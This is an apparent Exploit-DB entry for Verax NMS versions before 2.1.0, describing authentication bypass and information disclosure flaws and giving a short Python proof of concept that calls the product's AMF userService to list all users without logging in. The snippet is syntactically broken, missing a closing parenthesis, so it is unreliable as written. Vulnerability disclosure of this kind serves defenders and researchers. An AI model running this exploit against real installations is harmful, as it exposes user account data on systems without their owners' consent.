Verax NMS Multiple Method Authentication Bypass

ID EDB-ID:38366
Type exploitdb
Reporter Andrew Brooks
Modified 2013-02-06T00:00:00


Verax NMS Multiple Method Authentication Bypass. Webapps exploits for multiple platform


Verax NMS is prone to multiple security-bypass and information disclosure vulnerabilities.

Attackers can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and obtain sensitive information; this may aid in launching further attacks.

Versions prior to Verax NMS 2.1.0 are vulnerable. 


 #just based on
 from pyamf import AMF0, AMF3
 from pyamf.remoting.client import RemotingService

 client = RemotingService('http://installationurl/enetworkmanagementsystem-fds/messagebroker/amf',
 service = client.getService('userService')

 print service.getAllUsers()